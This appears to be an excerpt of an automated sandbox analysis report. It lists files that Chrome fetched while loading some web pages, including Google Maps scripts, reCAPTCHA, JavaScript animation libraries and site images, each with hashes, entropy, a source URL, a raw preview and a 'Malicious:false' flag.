                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (802)
                                              Category:downloaded
                                              Size (bytes):3308
                                              Entropy (8bit):5.5083394341383904
                                              Encrypted:false
                                              SSDEEP:48:fHKvPwII+sSQx+GzETrVdA6wcA411GbwIkBpCN63K91jJahGIdL2wl+nsIEGbR4t:fAwzx/5YTrVdB17I+puX7jECwljI1P2L
                                              MD5:2334D2C9424FC203B6672293A25994E8
                                              SHA1:D4CEFB27836F8BE576CC45C9BB0F5BA3AD281E52
                                              SHA-256:CE8FDEE05819227CE1A5EEC4B1B59B68599B26A414F5CA5343BFF490D4A6ED56
                                              SHA-512:11AC863540AB8EFD442986151E3CE798EE53FDC13C03F369380D5D37DE2D3405A1502AF88CD98BAC81E0ABE62B65B11F25F9DEFEDA94645D8B2995AB4A338D71
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/geometry.js
                                              Preview:google.maps.__gjsload__('geometry', function(_){var zsa=function(a,b){return Math.abs(_.fj(b-a,-180,180))},Asa=function(a,b,c,d,e){if(!d){c=zsa(a.lng(),c)/zsa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Di(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Di(b.lat())),_.Ei(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.al(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Di(a.lat());a=_.Di(a.lng());d=_.Di(b.lat());b=_.Di(b.lng());c=_.Di(c);return _.fj(_.Ei(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},Bsa=function(a,b){a=new _.Mj(a,!1);b=new _.Mj(b,!1);return a.equals(b)},Csa=function(a,b){const c=[];let d=[0,0],e;for(let f=0,g=_.Yi(a);f<g;++f)e=b?b(a[f]):a[f],rA.tE(e[0]-d[0],c),rA.tE(e[1]-d[1],c),d=e;return c.join("")},sA={containsLocation:function(a,b){a=_.Rj(a);const c=_.fj(a.lng(),-180,180),d=!!b.get
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:C++ source, Unicode text, UTF-8 text
                                              Category:dropped
                                              Size (bytes):15462
                                              Entropy (8bit):4.7631132208138265
                                              Encrypted:false
                                              SSDEEP:384:KRUZX+dho80YckNurimDV1tiqOSCjhyJ7l:3G0vkNurimDV1tiqOSCjhqx
                                              MD5:68DB860EF27EE297057EFB0DC2ED8F2D
                                              SHA1:DEFD8F4F881474227DC5EA78D794BBE5A75ACE91
                                              SHA-256:F2BFA11147355FFA836C0DA40A4C98A906E2115AD6B6D6B8DEB37C29DF3014FA
                                              SHA-512:628834485E4A5B9E18A5672C673CC5DD734AFC61A2C123D8515B5133EEF7A2C2E42C5B648EF4B1F5392AB6B2E18396A568EAEF06C3DB2D50FB2EE25C946DDC4B
                                              Malicious:false
                                              Reputation:low
                                              Preview:var VanillaTilt = (function () {.'use strict';../**. * Created by Sergiu .andor (micku7zu) on 1/27/2017.. * Original idea: https://github.com/gijsroge/tilt.js. * MIT License.. * Version 1.8.0. */..class VanillaTilt {. constructor(element, settings = {}) {. if (!(element instanceof Node)) {. throw ("Can't initialize VanillaTilt because " + element + " is not a Node.");. }.. this.width = null;. this.height = null;. this.clientWidth = null;. this.clientHeight = null;. this.left = null;. this.top = null;.. // for Gyroscope sampling. this.gammazero = null;. this.betazero = null;. this.lastgammazero = null;. this.lastbetazero = null;.. this.transitionTimeout = null;. this.updateCall = null;. this.event = null;.. this.updateBind = this.update.bind(this);. this.resetBind = this.reset.bind(this);.. this.element = element;. this.settings = this.extendSettings(settings);.. this.reverse = this.settings.reverse ? -1 : 1;. this
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):9016
                                              Entropy (8bit):7.947912147871962
                                              Encrypted:false
                                              SSDEEP:192:wEj55pkxSaRCVs+vV1llB2iZFrS27S+9FdcmQ5+0oyhAWByFWidIs9:wA5jkgac1lzm2D/dcmQoyhA9Ddb9
                                              MD5:68E152DB2CF31E55FE259FA40122A343
                                              SHA1:B2FFBB25E204E4ACAB8BA7B5F7C82DF436281484
                                              SHA-256:488650CA73D82583019BA1A1CD52B0DBF1AE193FAFEFDBD7AC4351A698BF4899
                                              SHA-512:79025BC893768CCE5B58F8F70925D82149B11573554118960BCFD3F6433DC0B39CBA39F8DC300727574408E69BECE193A1E3D2ECD16595E91510F7B949B8129E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)" xmpMM:InstanceID="xmp.iid:A260C674F94611EC8F2ACA399A1C8BAB" xmpMM:DocumentID="xmp.did:A260C675F94611EC8F2ACA399A1C8BAB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A260C672F94611EC8F2ACA399A1C8BAB" stRef:documentID="xmp.did:A260C673F94611EC8F2ACA399A1C8BAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#..l....IDATx..].X.W.~.4E.b.A.. 6......)j.-..%&..X.Fc.....{A......"E:.?3..rm..4....}.={v....w....!..*/C..)PE
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (8099)
                                              Category:dropped
                                              Size (bytes):8156
                                              Entropy (8bit):5.200876657858407
                                              Encrypted:false
                                              SSDEEP:192:tmEE6yAmu6qUxbU5C9nrr1GkEPIAeJ3KO4poIJ:EEE/Amu6qUxVBxGkAI///IJ
                                              MD5:3F3D63E2FEEA51DA5EA907E80E74D75D
                                              SHA1:CA546EF8E982C4B9D1AD43AD38FC702D0CB1D873
                                              SHA-256:1041568A299093EF168FD78F8B54C27D1CF0CDFAE8E870DE0769BA1174C6BC05
                                              SHA-512:20D9A51AC9B5EC340C4B9A5053FC35CF0C1E29514D8AA41D7F45F0F13270F64416F9652EFE7AAE63B0BEF7BD4637F5D56667A8AFF8AC0D61F88BB50FAB0B40B3
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*! WOW wow.js - v1.3.0 - 2016-10-04.* https://wowjs.uk.* Copyright (c) 2016 Thomas Grainger; Licensed MIT */!function(a,b){if("function"==typeof define&&define.amd)define(["module","exports"],b);else if("undefined"!=typeof exports)b(module,exports);else{var c={exports:{}};b(c,c.exports),a.WOW=c.exports}}(this,function(a,b){"use strict";function c(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function d(a,b){return b.indexOf(a)>=0}function e(a,b){for(var c in b)if(null==a[c]){var d=b[c];a[c]=d}return a}function f(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)}function g(a){var b=arguments.length<=1||void 0===arguments[1]?!1:arguments[1],c=arguments.length<=2||void 0===arguments[2]?!1:arguments[2],d=arguments.length<=3||void 0===arguments[3]?null:arguments[3],e=void 0;return null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.crea
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1546)
                                              Category:downloaded
                                              Size (bytes):3482
                                              Entropy (8bit):5.280960217431154
                                              Encrypted:false
                                              SSDEEP:96:aPfvCM5D9f/xjdN3EGUkJuJ5VofaNdVzN2JfE:cfaM5D9f/xjfEGUjbofaNdV4ZE
                                              MD5:E48F188473D454074A2AB3A34870A0CB
                                              SHA1:620BC90A66495D3CE47B303DE88EE0419455733A
                                              SHA-256:E0DE807AE54325DFC02FA6EBE3C2F863BC5428B8E8FD98A9FE96119A953FD103
                                              SHA-512:D41F5430C6AEE123E05095FF41EFA6D68CE4DB7D99CB3EE1343DFF5AFB02D36A960C42CBC190E14119D174E557EAA995E4A324BBD935C95D2B30227E61CE41EE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/search_impl.js
                                              Preview:google.maps.__gjsload__('search_impl', function(_){var izb=function(a,b){_.Bg(a.Gg,3,b)},mzb=function(a,b,c){var d=new jzb;d=_.WG(d);c.ur=d.load.bind(d);c.clickable=a.get("clickable")!==!1;_.EZa(c,_.lQ(b));b=[];b.push(_.bk(c,"click",kzb.bind(null,a)));for(const e of["mouseover","mouseout","mousemove"])b.push(_.bk(c,e,lzb.bind(null,a,e)));b.push(_.bk(a,"clickable_changed",()=>{a.Eg.clickable=a.get("clickable")!==!1}));a.Fg=b},kzb=function(a,b,c,d,e){let f=null;if(e&&(f={status:e.getStatus()},e.getStatus()===0)){f.location=_.V(e.Gg,2)?new _.Mj(_.$s(_.J(e.Gg,.2,_.et).Gg,1),_.$s(_.J(e.Gg,2,_.et).Gg,2)):null;const g={};f.fields=g;const h=_.Zh(e.Gg,3);for(let k=0;k<h;++k){const m=_.Zq(e.Gg,3,_.vQ,k);g[m.getKey()]=m.getValue()}}_.nk(a,"click",b,c,d,f)},lzb=function(a,b,c,d,e,f,g){let h=null;f&&(h={title:f[1].title,snippet:f[1].snippet});_.nk(a,b,c,d,e,h,g)},nzb=function(){},ozb=class{},pzb=class extends _.U{constructor(){super()}Pi(){return _.ri(this.Gg,2)}},qzb=[_.M,,,_.so,_.V_a];var rzb=cla
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15145
                                              Entropy (8bit):7.7013878152544395
                                              Encrypted:false
                                              SSDEEP:384:4YNg7z1yzRLaF+/rXLSuN+AjkkB7UBKJRaxnI:4YyP0zG+/zG6T5tUBKjUI
                                              MD5:01D5A06B513C43514BD7E54D762602CF
                                              SHA1:C2D64841032DDC51992CE973C4E92E6AADEC6DFD
                                              SHA-256:5C56397DD66E5A6AED32D7780B0CA6C89A98335C7CC616479DD38380876B0C73
                                              SHA-512:C262E8851F546413CA2B72E4F42C9C36D7ADB4A9DF42ED6F84383181E8771FA6D985295871276BC5913B087123782E183B1D436CCA8A0CAAA7E909B9D90034D4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/24/b29a91dab0ac5666672fdaaa4da6cb55.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):16690
                                              Entropy (8bit):7.985437476335532
                                              Encrypted:false
                                              SSDEEP:384:1sko+f1QeHGvFnXQjqv/uuAMW45SlOWbJUtikhHGFSU:eDsXmvFXQ+vHJElTbaEkhuSU
                                              MD5:1C8494660E66B4B5756EC416BA80646E
                                              SHA1:FE4D803431484F79B03A382A7A58555C39BA0876
                                              SHA-256:77957C9EFD4D8AC98AB665D632012E388FE26EE690F46F2B5D606A767B18EE25
                                              SHA-512:E4B97A82543DBC23E57F8AD2ED42138C5FDCB286637DAFBD13437A199E6006D5F4D35449959916A505E34078CBB0DA4A8B35BAC33D609FF6FAEB90FF7D9A5462
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/services/web.webp
                                              Preview:RIFF*A..WEBPVP8X........+.....ALPHF......m.H1...=."b.:E.0N.....h....D..C.B!.=...^..Y.q...&..j{..~P....+"&.om....&.N...)4.v@e.;`@...(...Z..F..>A..1.......yv.9..|.!,~.G.<..{.%.u..Z...~.gW../..B..n.q...ff%...K.<..../K.a...c4...e...._...n.....)Z^.b..N.sW../..B..v.4..V.c.......BX..q.1.X.....{...V.E,.0l._BX..8..-.Q6z[1.1J ).df...,U.As.Xk.w.0k.z.......<5RO...3.rq...b.....R..<..x...KZ^..!.d.z...r..........CJ)%+.^/..... ..6dn....!..._ff)..H.D5e...#..E.d.YJ..M......S.vS..j........,eyj..M7......,.........p.........{.(.._......_.....~=.n>3...............?.V.-~}}........H...o.oLl.1RL@..K4..Gz...kn{|'H..a...`........kl..2....aV7....G...$^..knq..Q.qq.n.....s..O.....S...z.^....O|JF3.9.hs['.<~.....&].L...x...k_..*9..s|.'...D.`l.l$.s.l'.n._....>J.|b^.~4.t..,I....D.=.z..:'.+\pH.#..r............x..j..H.......e.....W.Ic.]...N...g....,..66.1ov9.w1V..d....9m..F...["..>j.D2.2M..N..]%.*...#..>..H..DKSG.S.i.@...%r...N..k..^..=LFn.....R..7.v.?.3...tU....3..R..G.0.e
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5475
                                              Entropy (8bit):7.940805234117698
                                              Encrypted:false
                                              SSDEEP:96:0FdZlWOTSgj3T7QQJJzR8c9wGYg5z3Mw43cMrCggJp4UrIm/srFI9yfqtpkrtVpo:8nPjDRJ0cygGwacMGgg7PrlQIsiteJV+
                                              MD5:D2E4904BA9BDFEF458DC22F2745DCE56
                                              SHA1:7F88A35C592B974FC5C60C105708968DA8FC4C5D
                                              SHA-256:D402256EACC584CF2F01BA83E65C6A4D2DF050D1C5647C5619FFB9EF0FDCD096
                                              SHA-512:CA597477854BDAF5D65EB4B15A4A92B92EBD92321FA244B9B14C69DC49569F14067D5A87868305DFC345E24F87E792C79DCE57D5E9809CCD8061EAB77CD52680
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/shared-hosting.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE................................................................t.......-......x...........S........~..Y..`........h.).........t..n........y..............i.....i.....n.....c........c.....o..............?z....~...........y.!........._..c.....F...........X.....g.....R....0......|..........f...i...........w..[........N..Y.'.....T...L.......x...8r...... ......p..Y....~.....p...e............`..^....3.N...................).....4...y.....s.K..J..a.......o......k.....V..<.$.e.......K........Z......U.yFr.e..8>{.....L.|.........%.....W.+..X.<jM..*..C\~qT........../.....3~.9..m..u..7\.o.^T.................5O6x......8......!..A..f..^..|.Q...A...Qt.:P@w.V...........d.......F-...K.9.....:......lIDATh...SSW..s....!/...IJ(.$..."...$.$b$@.YY^.$:ic......X]....U....A..TV.vi..;...;...>.......W.....s>.......Z..Z... 2..$I. ...VKh.zJ...t.O.s.H...z..w..B..x:E.9...0p..6.333Y,...O).@.........(.*.?Rz5.<.....0...<....:D.......t...9T)..BH=.O......HS(4..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (724)
                                              Category:downloaded
                                              Size (bytes):551834
                                              Entropy (8bit):5.646059185430787
                                              Encrypted:false
                                              SSDEEP:6144:ytxIUYTteVvs0E8gSdoxS4MLYw1tZnAzsz1I9VBojCdzNDC2vPpD:ybYTZMgGopkAzsz1ciEU2d
                                              MD5:33AFF52B82A1DF246136E75500D93220
                                              SHA1:4675754451AF81F996EAB925923C31EF5115A9F4
                                              SHA-256:B5E8EC5D4DCC080657DEB2D004F65D974BF4EC9E9AA5D621E10749182FFF8731
                                              SHA-512:2E1BAAE95052737BDB3613A6165589643516A1F4811D19C2F037D426265AA5ADF3C70334C1106B1B0EEF779244389F0D7C8C52B4CD55FCE9BAB2E4FCB0642720
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var z=function(){return[function(v,p,K,u,W,n){if(!((v>>2&(n=[6,"Unknown format requested type for int64",9],n[0])||!U[22](11,this.U(),p)&&this.dispatchEvent("enter")&&this.isEnabled()&&R[23](n[2],this,2)&&R[3](n[0],2,!0,this),v-1)<20&&(v>>1&7)>=4&&(u=new vf,W=R[41](1,p,u,kV,K==p?K:P[8](37,K),5)),v<<1&11))throw Error(n[1]);return W},function(v,p,K,u,W){return((W=[17,7,46],v)<<2&W[1]||(p=function(n){return K.call(p.src,p.listener,n)},K=UJ,u=p),(v-1|12)<v&&(v-9|59)>=v)&&(u=M[W[2]](15,p)&&!M[W[2]](13,."iPod")&&!M[W[2]](W[0],K)),((v|8)&W[1])==1&&(u=p.Y?p.Y:p.I?"application/x-protobuffer":""),u},function(v,p,K,u,W){retu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15898
                                              Entropy (8bit):7.7135808882968195
                                              Encrypted:false
                                              SSDEEP:384:4YNg7MZQHoFvW+uQhaXIe6U3WPCJg5owKzU6dKu:4Yy4ZQHoVtVhaXZ3WPCJao9t
                                              MD5:EB5828BDCDFD2B2752D4CEB9BF3DAEF9
                                              SHA1:E1B523379A7ED1DB1592BEC893ED0934FF3E157A
                                              SHA-256:C1C7A9C3689A378C485E7CC3B2B6AE69582B2D2DF7FADA11580BFF10206AB69D
                                              SHA-512:041B7A2D9C30AC6422F024F9E9674FDDA74BC5BC20C9D52A1480257DBA137B43F697EE016479A070E5A1662E59CC28E7DC9AE466E4187A4E2F45B46861897A13
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/63/f229f2f284ddf9a8f13afcafbf4bf5bf.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):63024
                                              Entropy (8bit):7.9966336776389175
                                              Encrypted:true
                                              SSDEEP:1536:z58jIhvW7v8xzcbirPBkerpnYTb0u+XkmJBwtK02BsNk:nvwU9pPqe9niz1mHBsi
                                              MD5:792E6EB1BAA62D95DF09F5978E61E586
                                              SHA1:A9A26541EBC67BC4EEFFFF8670D9C1E5EBDEA7F8
                                              SHA-256:4C7CA2B2C0DF8E7675C72A9803E28D57751A32D1048DCA4C6145AEA2AB6FDFB4
                                              SHA-512:33C69F618EEEC16387366AAB03E0ED70532EE3736F2951368276C2E0C08DD57E4A480A47B1B81EADD12EF1079910118A95ECB95C479672A631E4815C0B67372A
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF(...WEBPVP8X..............VP8 ....PA...*....>.l.Q)+?....{...H8.x......R..........+.......g.....m....F.k.+..M9.....I..../..-.y..n:.6.q..{.....................{.S..M..W.......d....?....C....!..f...=....A..<..+..X...#....?c.O...{..y.'.w.~..> ...#.....,../N%,X..K.q..A........0.o.yVP..B.uhJqW5.n..^..lG\..{}.....P#o)....I3..B+^.w/.I.#..........K.V-...8.....-..S&....F,.;....=.g.x4..=.5f.9ee{.......Q...r....?....Q..mV:...U...e..w......>.h..p.|4..wi..!.3..i.NP?^+5|.&.8f.aD_.4~.4.......-...k........#:.\XJh..p.Q....+DL."~$t..'/<... (.|jX1D......fr.$.2....i%?.. .........G.-.DM...=L +|..R..3...z.......3..Z..0....dL..$...n...K.y..B.......i".0.k..ko.V.$..~_..F. _.#..".J.......X.,v).y/. .8I.......#.....+.....Y9%.....k......n....X...d.I..y......V..o....2...b9d@..3X{......P3c..~..o.5.V.&..E... .^H...`5.W....J.r....T...~k..Y)b..._x..{.41c.?l2,.A.<.h.|...3e...%.]<......t.u.F.AD@C......O.m.. {`.\Q............H}T.l......}Z...q~...W..@o{.:.`..S..;@P.Q..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):32144
                                              Entropy (8bit):7.992932255215369
                                              Encrypted:true
                                              SSDEEP:768:XHnBGF4BysbQHIRqvJhuw+I17fLKJfXMOM5vsaapAAXrZgzRIwPA:3BGqByJHpBZ+IgNcOuUP6AXSWwPA
                                              MD5:856C8182E1172AD67041E6E9C3C26BB3
                                              SHA1:C14C13358D9D8513CB93F37BBC50F781D7CF413A
                                              SHA-256:6C61E316E9BE71BA6B257B3A57DE24D4FAD795D037B1F07BFA7A186E31E7E7B3
                                              SHA-512:C7C4E031479973CC92EA137D4C6A7BD7464AA62F62F340E3AFE341D5AF093161BD29D9049A461A396FE92F9622CA020648A59687D7DCD7B521C49F6942A58421
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.}..WEBPVP8X..............VP8 .}......*....>.p.T)&4.....0..gn.............VmzDxG=o(..|...w.....Zy.~i.y..D.....n..7..vv2....._.7C.1..~.~..$.f=..b..d..?./....../.....a.......:......%..yB?.yg....O..G......L.......T=L.d %C..pr.[Y....(.<...R......2.S1...!.D.....K.:=.....u..;!.H...r.x!.f.p.eP.....'.g...XZ.\.q$[2...4.P..|=AF..83{..|.............7..%.;..,......Ki..\9.f.ScD..........Ng..A[.}......R#SNY.....'..../v........:.<..........Xa....rK.F_..........x:......h.M..e..8]..{...B.p.Uz`.....z...{!..*.cp.z6m.L7~..p.|1T{:D....l.I.M...@..p.Kby.1D:....3.&........%...'.1g.....X.L..^W.&...x.....{ .AP.@.. %_..\.R2a=..M..r...Y..|..)u.l.w.....Q6...0L!.7.*.T6......t=GC...6...N...G.%..e.1..%...3.e.(..o7...}.G..`C..m.......wJ..+4...5Qe..Dd..9.T=c..W.O.<M..... ...+.....c.n.....?..~.H....,cq8<iO?5..?zT.4.@~.>...6......n^...K..SQ'..l.C.R..F.K!.5.S..u..J....R2..Mi..FC9.=q...;.jeG%.....)u3.9......[.Y~...W".$1..sVGo.....]$...D...ac. ...4i.g.K.;.w....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5676
                                              Entropy (8bit):7.957804606600335
                                              Encrypted:false
                                              SSDEEP:96:S2NL+Cx2k/328beLmbtqwtNEcI6srHe0sJFFphRPUcFomfZe1VuU4qSA:SRCx2c328CLmbowLET6sLOBPFU4q5
                                              MD5:9F0A54078FAB7758E10137A2A745B042
                                              SHA1:B18A83C3B9C16465FAB3BDD5228EFF106098D733
                                              SHA-256:58AED1AB0084F4DF16930F9621046A024A52CF58D460FB7F181D74793AC07F9A
                                              SHA-512:4625BD50CEFC3CC90094BF94F4E5EA2E78846622D02D15203F83D5182A5D968072BA41712705B6122B206729BAEDE658585A4F9CCB7F2009F2E05EF69088B232
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..........q..y..s.....v...........n..|.....l........r..y........i..t..q.............A..S...{.,........z..>...b.f.....l..U........................-.[A...TIDATh.W.{.:.D...."D3...........^.(q.G....x....<&<.e..$.2..yj?..+.".....f...m.L......JR.0..4.<I....a..um.R4..0T.j].........a8^...0D.H.`.x...B...B.<.. .ns....A..R....,.|..i*... ...l.2!...i..A.TU......O.u?.J...J....!........p....m...<.....Eh...Hi.i........);...0..~......'.Mou...N..U.q..8F.1bn..2B....h.H@.....<vi6..Q.....^....8..s...."M..+....\0?....X=:J..v...\U}D.$..Z.2..%.*..y\..~.....U S.H....i.....Ya...4...r.b.....T.0w.s.\{K...&......}....moKp.8K..@.....#..FU........:!0...|.. ..WB.`..,c.t..3.AG......3.y=.P).R,+.s.H.=N....2.f.Eul$.y..a...*..U.T..,A........\.(...{J.p.ng..i....i.6.?@..i.1..D..l.]mU..nSJUXDN.....%,&.?.Rd...A....g.......Wzc<I.......#E...a[EE...*.c.K...U.i.D".V.nl._....h..u.4K.....J`8....p.$+*....O*.KP.....uQ..V...B.......*2r.mT.n'.R.r..bAsAEQ.B...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15206
                                              Entropy (8bit):7.68492686735954
                                              Encrypted:false
                                              SSDEEP:384:4YNg7TdjHezVeemqkL/seiCrcMleZ3sqD:4YyfdjHeMxq1VCoMlMD
                                              MD5:F1306B0DB626A307B99BD6B671CA6718
                                              SHA1:4AD26CDDAC7BEE558EB21AB6E05030D30755CDF1
                                              SHA-256:652C25C90AD8DD8F712E94F354380889161ED993EBB4AE06E1433CF8F64BF0FA
                                              SHA-512:F7FDCD31474A9A4EA14E15A61679D9D2EAAE72350BB1070E5246E4814EBD8A4D7270A32FFD03434F9874C6DC58E112A47B2E2ABFB79FEC536C6058B68E6E27F8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16076
                                              Entropy (8bit):7.716307828415955
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Z6dbwpARxyQDmKpyGPhIpzpIMjN4ETxWdiC:4Yy1myQDmpGPhIoMOiWQC
                                              MD5:BD87BBE49FC65DDAF67FA4A7166052E0
                                              SHA1:D67360A398D53C9FF7922FF5939F9AB3E503E709
                                              SHA-256:6034CA2F944C35C3A242319E8167DB7F3A77EBF5BAA91E091B46F7CAF983B60D
                                              SHA-512:D62233A271B3066B12ED6C840DACC049FA435F92C8A5A9A24700C4CB4BEA8CDDE158C7C6BE0CC9A65D80F97A372CA4FE413A90C7E87A71D66FEDA8B48E5A701E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/32/56b4dc6b7cfecafe2f8a70fb356471ca.jpg
